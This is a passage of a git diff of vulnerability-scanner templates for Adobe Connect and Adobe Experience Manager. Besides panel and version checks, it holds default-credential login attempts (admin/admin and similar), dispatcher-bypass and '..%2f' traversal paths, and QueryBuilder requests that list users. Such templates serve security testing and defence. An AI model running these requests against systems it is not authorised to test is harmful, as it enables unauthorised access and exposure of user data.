condition: and - - - type: status - status: - - 200 +id: adobe-connect-username-exposure + +info: + name: Adobe Connect Username Exposure + reference: https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html + author: dhiyaneshDk + severity: low + tags: adobe,disclosure + +requests: + - method: GET + path: + - "{{BaseURL}}/system/help/support" + + matchers-condition: and + matchers: + - type: word + words: + - 'Administrators name:' + - 'Support Administrators email address:' + part: body + condition: and + + - type: status + status: + - 200 diff --git a/poc/adobe/adobe-connect-username-exposure-98.yaml b/poc/adobe/adobe-connect-username-exposure-98.yaml index 088b39ad5e..2e4d3089a9 100644 --- a/poc/adobe/adobe-connect-username-exposure-98.yaml +++ b/poc/adobe/adobe-connect-username-exposure-98.yaml @@ -2,9 +2,10 @@ id: adobe-connect-username-exposure info: name: Adobe Connect Username Exposure - reference: https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html author: dhiyaneshDk severity: low + reference: + - https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html tags: adobe,disclosure requests: diff --git a/poc/adobe/adobe-connect-version-104.yaml b/poc/adobe/adobe-connect-version-104.yaml deleted file mode 100644 index 95b454f2f8..0000000000 --- a/poc/adobe/adobe-connect-version-104.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: adobe-connect-version - -info: - name: Adobe Connect Central Version - author: dhiyaneshDk - severity: info - metadata: - max-request: 1 - tags: adobe,misconfig - -http: - - method: GET - path: - - "{{BaseURL}}/version.txt" - - matchers-condition: and - matchers: - - type: word - words: - - 'package=' - part: body - - - type: word - words: - - 'text/plain' - part: header - - - type: status - status: - - 200 - -# digest: 4a0a00473045022100e63b3b76732fe722d3d76c704705f5f1fdab83c771742ce8a0f8cd2ed2fa2e5c022053f49fe20114fce1d298f13d19d4b25108498ca1d7f3591f4c6cd033205b4d09:922c64590222798bb761d5b6d8e72950 diff --git a/poc/adobe/adobe-connect-version-102.yaml b/poc/adobe/adobe-connect-version.yaml similarity index 100% rename from poc/adobe/adobe-connect-version-102.yaml rename to poc/adobe/adobe-connect-version.yaml diff --git a/poc/adobe/adobe-experience-manager-login-105.yaml b/poc/adobe/adobe-experience-manager-login-105.yaml deleted file mode 100644 index 4dbdef1e18..0000000000 --- a/poc/adobe/adobe-experience-manager-login-105.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: adobe-experience-manager-login - -info: - name: Adobe Experience Manager Login Panel - author: dhiyaneshDK - description: An Adobe Experience Manager login panel was detected. - severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22 - - https://business.adobe.com/products/experience-manager/adobe-experience-manager.html - tags: panel,aem,adobe - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 - -requests: - - method: GET - path: - - '{{BaseURL}}/libs/granite/core/content/login.html' - - matchers-condition: and - matchers: - - type: word - words: - - 'AEM Sign In' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/poc/adobe/adobe-experience-manager-login-106.yaml b/poc/adobe/adobe-experience-manager-login-106.yaml new file mode 100644 index 0000000000..2162a6646f --- /dev/null +++ b/poc/adobe/adobe-experience-manager-login-106.yaml @@ -0,0 +1,23 @@ +id: adobe-experience-manager-login + +info: + name: Adobe-Experience-Manager + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22 + tags: panel,aem,adobe + +requests: + - method: GET + path: + - '{{BaseURL}}/libs/granite/core/content/login.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'AEM Sign In' + + - type: status + status: + - 200 diff --git a/poc/adobe/adobe-experience-manager-login-109.yaml b/poc/adobe/adobe-experience-manager-login-109.yaml index 9148cd29f0..4dbdef1e18 100644 --- a/poc/adobe/adobe-experience-manager-login-109.yaml +++ b/poc/adobe/adobe-experience-manager-login-109.yaml @@ -3,15 +3,17 @@ id: adobe-experience-manager-login info: name: Adobe Experience Manager Login Panel author: dhiyaneshDK - severity: info description: An Adobe Experience Manager login panel was detected. + severity: info reference: + - https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22 - https://business.adobe.com/products/experience-manager/adobe-experience-manager.html + tags: panel,aem,adobe classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: cwe-id: CWE-200 - metadata: - shodan-query: http.title:"AEM Sign In" - tags: panel,aem,adobe requests: - method: GET diff --git a/poc/adobe/adobe-media-server-114.yaml b/poc/adobe/adobe-media-server-114.yaml new file mode 100644 index 0000000000..deaf55913a --- /dev/null +++ b/poc/adobe/adobe-media-server-114.yaml @@ -0,0 +1,23 @@ +id: adobe-media-server + +info: + name: Adobe Media Server + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22 + tags: panel,adobe + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Adobe Media Server' + + - type: status + status: + - 200 diff --git a/poc/adobe/adobe-media-server-115.yaml b/poc/adobe/adobe-media-server-115.yaml index deaf55913a..2ee6efc2c8 100644 --- a/poc/adobe/adobe-media-server-115.yaml +++ b/poc/adobe/adobe-media-server-115.yaml @@ -1,10 +1,15 @@ id: adobe-media-server info: - name: Adobe Media Server + name: Adobe Media Server Login Panel author: dhiyaneshDK severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22 + description: An Adobe Media Server login panel was detected. + reference: + - https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22 + - https://helpx.adobe.com/support/adobe-media-server.html + classification: + cwe-id: CWE-200 tags: panel,adobe requests: @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/poc/adobe/adobe-media-server.yaml b/poc/adobe/adobe-media-server.yaml deleted file mode 100644 index 2ee6efc2c8..0000000000 --- a/poc/adobe/adobe-media-server.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: adobe-media-server - -info: - name: Adobe Media Server Login Panel - author: dhiyaneshDK - severity: info - description: An Adobe Media Server login panel was detected. - reference: - - https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22 - - https://helpx.adobe.com/support/adobe-media-server.html - classification: - cwe-id: CWE-200 - tags: panel,adobe - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - words: - - 'Adobe Media Server' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/poc/adobe/aem-bg-servlet-129.yaml b/poc/adobe/aem-bg-servlet-129.yaml deleted file mode 100644 index b751c4f52a..0000000000 --- a/poc/adobe/aem-bg-servlet-129.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: aem-bg-servlet - -info: - name: AEM BG-Servlets - author: DhiyaneshDk - severity: info - reference: - - https://www.slideshare.net/0ang3el/hunting-for-security-bugs-in-aem-webapps-129262212 - metadata: - max-request: 1 - shodan-query: http.component:"Adobe Experience Manager" - tags: aem,misconfig - -http: - - method: GET - path: - - '{{BaseURL}}/system/bgservlets/test.css' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - '
Flushing output
' - -# digest: 4a0a00473045022011679f68ea9ea8736dfbf616cd843e2cd2a218f0f4d79653b8e1b3f66e88310a022100e65d71edf92b948507e7fd6c201b5804ca45fc3c262753fe9804347322869acf:922c64590222798bb761d5b6d8e72950 diff --git a/poc/adobe/aem-bg-servlet.yaml b/poc/adobe/aem-bg-servlet.yaml new file mode 100644 index 0000000000..6a3c2a07b3 --- /dev/null +++ b/poc/adobe/aem-bg-servlet.yaml @@ -0,0 +1,24 @@ +id: aem-bg-servlet + +info: + name: AEM BG-Servlets + author: DhiyaneshDk + severity: info + reference: + - https://www.slideshare.net/0ang3el/hunting-for-security-bugs-in-aem-webapps-129262212 + tags: aem + +requests: + - method: GET + path: + - '{{BaseURL}}/system/bgservlets/test.css' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '
Flushing output
' \ No newline at end of file diff --git a/poc/adobe/aem-cached-pages.yaml b/poc/adobe/aem-cached-pages.yaml index cba756b341..6a36c8d2b3 100644 --- a/poc/adobe/aem-cached-pages.yaml +++ b/poc/adobe/aem-cached-pages.yaml @@ -4,31 +4,22 @@ info: name: Invalidate / Flush Cached Pages on AEM author: hetroublemakr severity: low - reference: - - https://twitter.com/AEMSecurity/status/1244965623689609217 - metadata: - max-request: 1 - shodan-query: http.component:"Adobe Experience Manager" - tags: aem,misconfig + tags: aem + reference: https://twitter.com/AEMSecurity/status/1244965623689609217 -http: +requests: - method: GET path: - "{{BaseURL}}/dispatcher/invalidate.cache" - headers: CQ-Handle: /content CQ-Path: /content - matchers-condition: and matchers: - type: word - part: body words: - "

OK

" - + part: body - type: status status: - 200 - -# digest: 4a0a00473045022100fa449369a6b6a19ef08cfa7a83f341000fcbeff5f0fe0b11f236a2463c6fc27802204261447eae5853abfbe57ff0be79318ab2cb59f47717c548474bb6f5e8225959:922c64590222798bb761d5b6d8e72950 diff --git a/poc/adobe/aem-default-get-servlet-137.yaml b/poc/adobe/aem-default-get-servlet-135.yaml similarity index 100% rename from poc/adobe/aem-default-get-servlet-137.yaml rename to poc/adobe/aem-default-get-servlet-135.yaml diff --git a/poc/adobe/aem-default-login-140.yaml b/poc/adobe/aem-default-login-140.yaml deleted file mode 100644 index 8072025a73..0000000000 --- a/poc/adobe/aem-default-login-140.yaml +++ /dev/null @@ -1,56 +0,0 @@ -id: aem-default-login - -info: - name: Adobe AEM Default Login - author: random-robbie - severity: high - description: Adobe AEM default login credentials were discovered. - reference: - - https://experienceleague.adobe.com/docs/experience-manager-64/administering/security/security-checklist.html?lang=en - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: aem,default-login,adobe - - -requests: - - raw: - - | - POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Origin: {{BaseURL}} - Referer: {{BaseURL}}/libs/granite/core/content/login.html - - _charset_=utf-8&j_username={{aem_user}}&j_password={{aem_pass}}&j_validate=true - - attack: pitchfork - payloads: - aem_user: - - admin - - grios - - replication-receiver - - vgnadmin - - aem_pass: - - admin - - password - - replication-receiver - - vgnadmin - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: header - condition: and - words: - - login-token - - crx.default - -# Enhanced by mp on 2022/03/23 diff --git a/poc/adobe/aem-default-login-141.yaml b/poc/adobe/aem-default-login-141.yaml index 30c718c891..66a6189c19 100644 --- a/poc/adobe/aem-default-login-141.yaml +++ b/poc/adobe/aem-default-login-141.yaml @@ -12,11 +12,10 @@ info: cvss-score: 8.3 cwe-id: CWE-522 metadata: - max-request: 8 shodan-query: http.component:"Adobe Experience Manager" tags: aem,default-login,adobe -http: +requests: - raw: - | POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 @@ -38,6 +37,7 @@ http: - anonymous - jdoe@geometrixx.info - aparker@geometrixx.info + aem_pass: - admin - password @@ -47,8 +47,8 @@ http: - anonymous - jdoe - aparker - stop-at-first-match: true + stop-at-first-match: true matchers-condition: and matchers: - type: status @@ -62,4 +62,4 @@ http: - crx.default condition: and -# digest: 4a0a004730450220222a3b892a7451300a85043c153a1fbe5d336d8c9f30c474065214bbac5906bc022100981335810687d458df2fb4ca0c7698ec9597777f599956f12f0a62b18f285727:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/03/23 diff --git a/poc/adobe/aem-default-login-142.yaml b/poc/adobe/aem-default-login-142.yaml index 0f201e7c6b..8072025a73 100644 --- a/poc/adobe/aem-default-login-142.yaml +++ b/poc/adobe/aem-default-login-142.yaml @@ -3,9 +3,17 @@ id: aem-default-login info: name: Adobe AEM Default Login author: random-robbie - severity: critical + severity: high + description: Adobe AEM default login credentials were discovered. + reference: + - https://experienceleague.adobe.com/docs/experience-manager-64/administering/security/security-checklist.html?lang=en + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: aem,default-login,adobe + requests: - raw: - | @@ -44,3 +52,5 @@ requests: words: - login-token - crx.default + +# Enhanced by mp on 2022/03/23 diff --git a/poc/adobe/aem-gql-servlet-149.yaml b/poc/adobe/aem-gql-servlet-149.yaml deleted file mode 100644 index 977dc70f75..0000000000 --- a/poc/adobe/aem-gql-servlet-149.yaml +++ /dev/null @@ -1,56 +0,0 @@ -id: aem-gql-servlet - -info: - name: AEM GQLServlet - author: dhiyaneshDk,prettyboyaaditya - severity: low - reference: - - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/reference-materials/javadoc/index.html?org/apache/jackrabbit/commons/query/GQL.html - tags: aem - -requests: - - method: GET - path: - - '{{BaseURL}}/bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico' - - '{{BaseURL}}/bin/wcm/search/gql.servlet.json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.1.json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.4.2.1...json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.css?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.js?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.ico?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.png?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.html?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.servlet.json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.1.json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.4.2.1...json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.css?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.ico?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.png?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.js?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.html?query=type:base%20limit:..1&pathPrefix=' - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'excerpt' - - 'path' - - 'hits' - condition: and diff --git a/poc/adobe/aem-gql-servlet-150.yaml b/poc/adobe/aem-gql-servlet-150.yaml new file mode 100644 index 0000000000..36a597b300 --- /dev/null +++ b/poc/adobe/aem-gql-servlet-150.yaml @@ -0,0 +1,26 @@ +id: aem-gql-servlet + +info: + author: DhiyaneshDk + name: AEM GQLServlet + severity: low + reference: https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/reference-materials/javadoc/index.html?org/apache/jackrabbit/commons/query/GQL.html + tags: aem + + +requests: + - method: GET + path: + - '{{BaseURL}}/bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico' + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'excerpt' + - 'path' + - 'hits' + condition: and diff --git a/poc/adobe/aem-groovyconsole-154.yaml b/poc/adobe/aem-groovyconsole-154.yaml deleted file mode 100644 index c53445d395..0000000000 --- a/poc/adobe/aem-groovyconsole-154.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: aem-groovyconsole -info: - name: AEM Groovy console enabled - author: twitter.com/Dheerajmadhukar - severity: critical - description: Groovy console is exposed, RCE is possible. - reference: https://hackerone.com/reports/672243 - tags: aem -requests: - - method: GET - path: - - "{{BaseURL}}/groovyconsole" - headers: - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Language: en-US,en;q=0.9,hi;q=0.8 - User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36 - matchers-condition: and - matchers: - - type: word - words: - - "Groovy Console" - - "Run Script" - - "Groovy Web Console" - part: body - condition: and - - type: status - status: - - 200 diff --git a/poc/adobe/aem-groovyconsole-155.yaml b/poc/adobe/aem-groovyconsole-155.yaml index 9709becc71..c53445d395 100644 --- a/poc/adobe/aem-groovyconsole-155.yaml +++ b/poc/adobe/aem-groovyconsole-155.yaml @@ -1,30 +1,19 @@ id: aem-groovyconsole - info: name: AEM Groovy console enabled - author: x86rd + author: twitter.com/Dheerajmadhukar severity: critical description: Groovy console is exposed, RCE is possible. reference: https://hackerone.com/reports/672243 tags: aem - requests: - method: GET path: - "{{BaseURL}}/groovyconsole" - - "{{BaseURL}}/api/groovyconsole" - - "{{BaseURL}}/aem/groovyconsole" - - "{{BaseURL}}/app/groovyconsole" - - "{{BaseURL}}/..%2f..%2f..%2fgroovyconsole" - - "{{BaseURL}}/..%2f..%2f..%2fapi/groovyconsole" - - "{{BaseURL}}/aem/..%2f..%2f..%2fgroovyconsole" - - "{{BaseURL}}/app/..%2f..%2f..%2fgroovyconsole" - headers: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US,en;q=0.9,hi;q=0.8 User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36 - matchers-condition: and matchers: - type: word @@ -36,4 +25,4 @@ requests: condition: and - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/poc/adobe/aem-jcr-querybuilder-162.yaml b/poc/adobe/aem-jcr-querybuilder-162.yaml deleted file mode 100644 index 29bc15e28f..0000000000 --- a/poc/adobe/aem-jcr-querybuilder-162.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: aem-jcr-querybuilder - -info: - author: DhiyaneshDk - name: Query JCR role via QueryBuilder Servlet - severity: info - tags: aem - -requests: - - raw: - - | - GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - '"success":true' - - 'jcr:uuid' - condition: and \ No newline at end of file diff --git a/poc/adobe/aem-jcr-querybuilder-164.yaml b/poc/adobe/aem-jcr-querybuilder-164.yaml index 15a5d6c4d4..8f3e065dcf 100644 --- a/poc/adobe/aem-jcr-querybuilder-164.yaml +++ b/poc/adobe/aem-jcr-querybuilder-164.yaml @@ -1,28 +1,28 @@ -id: aem-jcr-querybuilder - -info: - name: Query JCR role via QueryBuilder Servlet - author: DhiyaneshDk - severity: info - tags: aem - -requests: - - raw: - - | - GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - '"success":true' - - 'jcr:uuid' +id: aem-jcr-querybuilder + +info: + author: DhiyaneshDk + name: Query JCR role via QueryBuilder Servlet + severity: info + tags: aem + +requests: + - raw: + - | + GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1 + Host: {{Hostname}} + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '"success":true' + - 'jcr:uuid' condition: and \ No newline at end of file diff --git a/poc/adobe/aem-jcr-querybuilder-165.yaml b/poc/adobe/aem-jcr-querybuilder-165.yaml new file mode 100644 index 0000000000..3dfcd291c4 --- /dev/null +++ b/poc/adobe/aem-jcr-querybuilder-165.yaml @@ -0,0 +1,31 @@ +id: aem-jcr-querybuilder + +info: + author: DhiyaneshDk + name: Query JCR role via QueryBuilder Servlet + severity: info + tags: aem + +requests: + - raw: + - | + GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + Connection: close + Upgrade-Insecure-Requests: 1 + Cache-Control: max-age=0 + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '"success":true' + - 'jcr:uuid' \ No newline at end of file diff --git a/poc/adobe/aem-jcr-querybuilder-166.yaml b/poc/adobe/aem-jcr-querybuilder-166.yaml index 3dfcd291c4..29bc15e28f 100644 --- a/poc/adobe/aem-jcr-querybuilder-166.yaml +++ b/poc/adobe/aem-jcr-querybuilder-166.yaml @@ -11,13 +11,9 @@ requests: - | GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate - Connection: close - Upgrade-Insecure-Requests: 1 - Cache-Control: max-age=0 matchers-condition: and matchers: @@ -28,4 +24,5 @@ requests: - type: word words: - '"success":true' - - 'jcr:uuid' \ No newline at end of file + - 'jcr:uuid' + condition: and \ No newline at end of file diff --git a/poc/adobe/aem-login-status-169.yaml b/poc/adobe/aem-login-status-167.yaml similarity index 100% rename from poc/adobe/aem-login-status-169.yaml rename to poc/adobe/aem-login-status-167.yaml diff --git a/poc/adobe/aem-merge-metadata-servlet-172.yaml b/poc/adobe/aem-merge-metadata-servlet-172.yaml index 7f4a093732..94bdc1a137 100644 --- a/poc/adobe/aem-merge-metadata-servlet-172.yaml +++ b/poc/adobe/aem-merge-metadata-servlet-172.yaml @@ -6,16 +6,12 @@ info: severity: info reference: - https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91 - metadata: - max-request: 1 - shodan-query: http.component:"Adobe Experience Manager" - tags: aem,misconfig + tags: aem -http: +requests: - method: GET path: - '{{BaseURL}}/libs/dam/merge/metadata.html?path=/etc&.ico' - matchers-condition: and matchers: - type: status @@ -26,5 +22,3 @@ http: words: - 'assetPaths' condition: and - -# digest: 4a0a0047304502204c5922229b04b36c72ca391555bf2cbb57bca10d36b6281cd4d4f7677fc222fa022100b04f9edf21b17af0df74d22e4d9de9706c52fe5a1e4ab6ef1d0f725d81bb0c7c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/adobe/aem-merge-metadata-servlet-174.yaml b/poc/adobe/aem-merge-metadata-servlet-174.yaml deleted file mode 100644 index 94bdc1a137..0000000000 --- a/poc/adobe/aem-merge-metadata-servlet-174.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: aem-merge-metadata-servlet - -info: - name: AEM MergeMetadataServlet - author: DhiyaneshDk - severity: info - reference: - - https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91 - tags: aem - -requests: - - method: GET - path: - - '{{BaseURL}}/libs/dam/merge/metadata.html?path=/etc&.ico' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'assetPaths' - condition: and diff --git a/poc/adobe/aem-querybuilder-internal-path-read-179.yaml b/poc/adobe/aem-querybuilder-internal-path-read-179.yaml new file mode 100644 index 0000000000..5d765ed219 --- /dev/null +++ b/poc/adobe/aem-querybuilder-internal-path-read-179.yaml @@ -0,0 +1,30 @@ +id: aem-querybuilder-internal-path-read + +info: + name: AEM QueryBuilder Internal Path Read + author: DhiyaneshDk + severity: medium + reference: + - https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91 + tags: aem + +requests: + - method: GET + path: + - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1' + - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1' + - '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1' + - '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'jcr:path' + - 'success' + condition: and \ No newline at end of file diff --git a/poc/adobe/aem-querybuilder-internal-path-read-180.yaml b/poc/adobe/aem-querybuilder-internal-path-read-180.yaml deleted file mode 100644 index 5e8033b220..0000000000 --- a/poc/adobe/aem-querybuilder-internal-path-read-180.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: aem-querybuilder-internal-path-read -info: - author: DhiyaneshDk - name: AEM QueryBuilder Internal Path Read - severity: medium - reference: https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91 - tags: aem -requests: - - method: GET - path: - - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1' - - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1' - - '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1' - - '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - 'jcr:path' - - 'success' - condition: and diff --git a/poc/adobe/aem-querybuilder-json-servlet-182.yaml b/poc/adobe/aem-querybuilder-json-servlet-182.yaml index 1099f8bdd7..073fc99968 100644 --- a/poc/adobe/aem-querybuilder-json-servlet-182.yaml +++ b/poc/adobe/aem-querybuilder-json-servlet-182.yaml @@ -1,30 +1,42 @@ -id: aem-querybuilder-json-servlet - -info: - author: DhiyaneshDk - name: AEM QueryBuilder Json Servlet - severity: info - reference: https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html - tags: aem - - -requests: - - method: GET - path: - - '{{BaseURL}}/bin/querybuilder.json' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "application/json" - part: header - - - type: word - words: - - 'success' - - 'results' - condition: and +id: aem-querybuilder-json-servlet + +info: + author: DhiyaneshDk + name: AEM QueryBuilder Json Servlet + severity: info + description: Sensitive information might be exposed via AEMs QueryBuilderServlet or QueryBuilderFeedServlet. + reference: + - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html + - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/QueryBuilderExposed.java + tags: aem,adobe + + +requests: + - method: GET + path: + - '{{BaseURL}}/bin/querybuilder.json' + - '{{BaseURL}}/bin/querybuilder.json.servlet' + - '{{BaseURL}}///bin///querybuilder.json' + - '{{BaseURL}}///bin///querybuilder.json.servlet' + - '{{BaseURL}}/bin/querybuilder.feed' + - '{{BaseURL}}/bin/querybuilder.feed.servlet' + - '{{BaseURL}}///bin///querybuilder.feed' + - ' {{BaseURL}}///bin///querybuilder.feed.servlet' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 